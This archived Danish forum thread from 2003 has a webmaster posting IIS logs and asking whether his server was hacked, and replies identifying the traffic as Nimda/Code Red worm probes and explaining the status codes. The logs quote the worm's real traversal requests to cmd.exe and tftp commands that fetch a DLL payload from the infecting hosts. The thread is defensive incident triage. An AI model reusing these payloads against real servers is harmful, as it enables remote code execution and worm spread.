/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
hack?
Fra : McBrain


Dato : 22-02-03 23:50

er det her en der har hacket min webserver?....min ip er xxxxxxxx?



OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600

2003-02-21 13:34:12 192.168.0.2 - 192.168.0.1 80 PROPFIND /Jonasprøve - 404
Microsoft-WebDAV-MiniRedir/5.1.2600

2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET /scripts/root.exe
/c+dir 404 -

2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -

2003-02-21 14:33:27 80.236.81.176 - xxxxxxxxxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:33:32 80.236.81.176 - xxxxxxxxxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 14:35:24 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 14:36:22 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -

2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:36:35 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 14:36:37 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 14:36:41 80.236.81.176 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -

2003-02-21 14:36:44 80.236.81.176 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:36:45 80.236.81.176 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -

2003-02-21 14:36:47 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

2003-02-21 14:36:48 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 14:36:55 80.236.81.176 - xxxxxxxxxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /index.htm - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET /ocsc-title.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.jpg - 304
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /enter.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET
/bigk-member-profile.htm - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 18:21:24 80.198.58.140 - xxxxxxxxxx 80 GET /big-k.jpg - 200
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /scripts/root.exe /c+dir
404 -

2003-02-21 19:18:51 80.81.70.4 - xxxxxxxxxx 80 GET /MSADC/root.exe /c+dir
403 -

2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -

2003-02-21 19:18:53 80.81.70.4 - xxxxxxxxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -

2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 19:19:44 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 19:19:45 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..%5c../httpodbc.dll - 500 -

2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -

2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20c:\httpodbc.dll 502 -

2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20d:\httpodbc.dll 502 -

2003-02-21 19:19:47 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2080.81.70.4%20GET%20cool.dll%20e:\httpodbc.dll 502 -

2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -

2003-02-21 19:19:49 80.81.70.4 - xxxxxxxxxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -

2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -

2003-02-21 19:19:50 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -

2003-02-21 19:19:51 80.81.70.4 - xxxxxxxxxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -




 
 
Kasper Pedersen (23-02-2003)
Kommentar
Fra : Kasper Pedersen


Dato : 23-02-03 00:26


"McBrain" <jojo@yahoo.dk> wrote in message news:3e57fe9b$0$15882$edfadb0f@dread11.news.tele.dk...
> 2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
> 2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
> 2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
> 2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
> 2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -

80.236.81.176 ligner en inficeret maskine
80.81.70.4 ditto, jeg har 16 fra den: [22/Feb/2003:06:28:41 +0100] "GET /scripts/root.exe HTTP/1.0" 404 - ipsite

Hej Jonas. Det ser ud som om du har brug for et par security packs.
Det ser jo sjovt nok ikke ud som om der rent faktisk er blevet GJORT noget; man plejer at se en mere kompleks cmd bagefter, til
overførsel af payload efter at orm/lign. har identificeret systemet som sårbart. Men der er vel også bugs i den slags kode.

/Kasper Pedersen
www.stivan.dk



McBrain (23-02-2003)
Kommentar
Fra : McBrain


Dato : 23-02-03 00:42

er der et sted hvor jeg kan lære hvad fanden de kommandoer betyder....og
hvorfor kalder de hele tide dos-prompten?

"Kasper Pedersen" <kasper@traceroute.dk> skrev i en meddelelse
news:3e580702$0$137$edfadb0f@dtext02.news.tele.dk...
>
> "McBrain" <jojo@yahoo.dk> wrote in message
news:3e57fe9b$0$15882$edfadb0f@dread11.news.tele.dk...
> > 2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
> > 2003-02-21 14:36:25 80.236.81.176 - xxxxxxxxxx 80 GET
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
> > 2003-02-21 14:36:50 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
> > 2003-02-21 19:18:55 80.81.70.4 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
> > 2003-02-21 19:19:46 80.81.70.4 - xxxxxxxxxx 80 GET
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
>
> 80.236.81.176 ligner en inficeret maskine
> 80.81.70.4 ditto, jeg har 16 fra den: [22/Feb/2003:06:28:41 +0100] "GET
/scripts/root.exe HTTP/1.0" 404 - ipsite
>
> Hej Jonas. Det ser ud som om du har brug for et par security packs.
> Det ser jo sjovt nok ikke ud som om der rent faktisk er blevet GJORT
noget; man plejer at se en mere kompleks cmd bagefter, til
> overførsel af payload efter at orm/lign. har identificeret systemet som
sårbart. Men der er vel også bugs i den slags kode.
>
> /Kasper Pedersen
> www.stivan.dk
>
>



Anders Lund (23-02-2003)
Kommentar
Fra : Anders Lund


Dato : 23-02-03 01:57

McBrain wrote:
> er der et sted hvor jeg kan lære hvad fanden de kommandoer
> betyder....og hvorfor kalder de hele tide dos-prompten?


Læs lidt om Nimda:
<http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
>

Kort: Nimda er en orm, som bla. udnytter et sikkerhedshul i IIS, til at
inficere webservere. De kommandoer du ser, er det der skal til at udnytte
dette sikkerhedshul.
--
Anders Lund - spam2003@andersonline.dk
OE-QuoteFix - Et Outlook Express must - http://flash.to/oe-quotefix
"Hvis du kun leder efter fejl, finder du ikke andet."


F.Larsen (23-02-2003)
Kommentar
Fra : F.Larsen


Dato : 23-02-03 13:17

"Anders Lund" <spam2003@andersonline.dk> wrote in message
news:b3965q$j98$1@news.cybercity.dk...
> Kort: Nimda er en orm, som bla. udnytter et sikkerhedshul i IIS, til at
> inficere webservere. De kommandoer du ser, er det der skal til at udnytte
> dette sikkerhedshul.

Nimda eller codered
Man bør måske også tilføje at du sandsynligvis ikke er inficeret når du ser
kommandoerne i loggen, men det aldrig skade at tjekke at din server er
up2date.

McBrain: Du kan også søge på google, emnet har været diskuteret til
hudløshed (548 gange :):
http://groups.google.com/groups?q=dk.edb.sikkerhed+nimda+

--
Flemming
http://home.cbkn.dk/Spyware/
http://home.cbkn.dk/Spam/



dudsen (23-02-2003)
Kommentar
Fra : dudsen


Dato : 23-02-03 02:09

McBrain wrote:

> er det her en der har hacket min webserver?....min ip er xxxxxxxx?

Her er lige en gennemgang af hvad der rent faktisk vises i loggen.

> 2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/root.exe /c+dir 404 -

Den returmere en "404 file not found" altså severen vil/kan ikke finde
den fil.

> 2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET
> /MSADC/root.exe /c+dir 403 -

Den retunerer en "403 Forbidden" altså severen vil ikke udføre
forespøgslen.
> 2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -

Av av den ville godt give klienten adgang til cmd.exe.
koden er 200 OK

> 2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe
> /c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502
> -

Yderligere fårsøg jeg ved ikke nok om hvordan orme virker til at sige
hvad der sker men jeg kan ikke lide den 502 "Bad Gateway" Der
indikere at serveren har forsøgt at udføre forespøgslen.

> 2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
> /scripts/..%5c../httpodbc.dll - 500 -

Ny forespøgsels type denne gang med en "500 Internal server Error" til
følge.

> 2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET
> /ocsc-title.jpg - 304
> Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

Legitim forespøgsel "304 Not Modified" någet proxy haløg den fortæller
klienten at den ikke behøver opdatere igen.

> 2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm
> - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)

well denne her gang er vi tilfredse med en 200OK endnu en tilfreds
bruger

40x fejl er "sikre" nok de indikere ikke et hul.
Det di indkere er at fok spørger efter sider du ikke har det bør
indholds udviklerne værre opmærsom på hvis det da er legitime
forespøgsler.
200 tjaa den må ikke give adgang til cmd.exe eller for den sags skyld
noget som helst uden for det bibliotek du har dine html filer.
304 samme som med 200
50x Betyder at den har fårsøgt at udføre en handling men har fejlet
altså noget er galt.
Det behøver ikke betyde at serveren har det dårligt eller er sårbar.
Men det kan det gøre.
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html for udybende
svar.

--
Daniel Udsen
Jorden gik under i går

McBrain (23-02-2003)
Kommentar
Fra : McBrain


Dato : 23-02-03 03:27

mange tak....det skal siges at serveren nu er fuldt opdateret....spændende
at se om det sker igen.....
"dudsen" <dudsen@gjk.dk> skrev i en meddelelse
news:b39776$f9m$1@sunsite.dk...
> McBrain wrote:
>
> > er det her en der har hacket min webserver?....min ip er xxxxxxxx?
>
> Her er lige en gennemgang af hvad der rent faktisk vises i loggen.
>
> > 2003-02-21 14:33:17 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/root.exe /c+dir 404 -
>
> Den returmere en "404 file not found" altså severen vil/kan ikke finde
> den fil.
>
> > 2003-02-21 14:33:23 80.236.81.176 - xxxxxxxxxx 80 GET
> > /MSADC/root.exe /c+dir 403 -
>
> Den retunerer en "403 Forbidden" altså severen vil ikke udføre
> forespøgslen.
> > 2003-02-21 14:33:39 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
>
> Av av den ville godt give klienten adgang til cmd.exe.
> koden er 200 OK
>
> > 2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../winnt/system32/cmd.exe
> > /c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502
> > -
>
> Yderligere fårsøg jeg ved ikke nok om hvordan orme virker til at sige
> hvad der sker men jeg kan ikke lide den 502 "Bad Gateway" Der
> indikere at serveren har forsøgt at udføre forespøgslen.
>
> > 2003-02-21 14:36:23 80.236.81.176 - xxxxxxxxxx 80 GET
> > /scripts/..%5c../httpodbc.dll - 500 -
>
> Ny forespøgsels type denne gang med en "500 Internal server Error" til
> følge.
>
> > 2003-02-21 18:19:23 80.198.58.140 - xxxxxxxxxx 80 GET
> > /ocsc-title.jpg - 304
> > Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
>
> Legitim forespøgsel "304 Not Modified" någet proxy haløg den fortæller
> klienten at den ikke behøver opdatere igen.
>
> > 2003-02-21 18:20:18 80.198.58.140 - xxxxxxxxxx 80 GET /downloads.htm
> > - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
>
> well denne her gang er vi tilfredse med en 200OK endnu en tilfreds
> bruger
>
> 40x fejl er "sikre" nok de indikere ikke et hul.
> Det di indkere er at fok spørger efter sider du ikke har det bør
> indholds udviklerne værre opmærsom på hvis det da er legitime
> forespøgsler.
> 200 tjaa den må ikke give adgang til cmd.exe eller for den sags skyld
> noget som helst uden for det bibliotek du har dine html filer.
> 304 samme som med 200
> 50x Betyder at den har fårsøgt at udføre en handling men har fejlet
> altså noget er galt.
> Det behøver ikke betyde at serveren har det dårligt eller er sårbar.
> Men det kan det gøre.
> http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html for udybende
> svar.
>
> --
> Daniel Udsen
> Jorden gik under i går



F.Larsen (23-02-2003)
Kommentar
Fra : F.Larsen


Dato : 23-02-03 13:22

"McBrain" <jojo@yahoo.dk> wrote in message
news:3e58315a$0$15834$edfadb0f@dread11.news.tele.dk...
> mange tak....det skal siges at serveren nu er fuldt opdateret....spændende
> at se om det sker igen.....

Lyder klart som om der er noget galt da det er en af sympomerne på at en
server er smittet, dvs den går i gang med at smitte andre server på fuld
kraft.

Tjek din NT taskliste og se hvad maskinen laver ...

PS. McBrain, kunne jeg ikke få dig til at skrive _under_ det du svarer på...
http://www.usenet.dk/netikette/citatteknik.html

--
Flemming
http://home.cbkn.dk/Spyware/
http://home.cbkn.dk/Security/



Jesper Dybdal (23-02-2003)
Kommentar
Fra : Jesper Dybdal


Dato : 23-02-03 12:30

dudsen <dudsen@gjk.dk> wrote:

>> 2003-02-21 14:34:31 80.236.81.176 - xxxxxxxxxx 80 GET
>> /scripts/..%5c../winnt/system32/cmd.exe
>> /c+tftp%20-i%2080.236.81.176%20GET%20cool.dll%20c:\httpodbc.dll 502
>> -
>
>Yderligere fårsøg jeg ved ikke nok om hvordan orme virker til at sige
>hvad der sker men jeg kan ikke lide den 502 "Bad Gateway" Der
>indikere at serveren har forsøgt at udføre forespøgslen.

Den forsøger at udføre tftp-kommandoen for at hente selve
Nimda-ormen fra IP-adressen 80.236.81.176, som allerede er
inficeret og hvor den har etableret en tftp-server.

--
Jesper Dybdal, Denmark.
http://www.dybdal.dk (in Danish).

Søg
Reklame
Statistik
Spørgsmål : 177548
Tips : 31968
Nyheder : 719565
Indlæg : 6408803
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste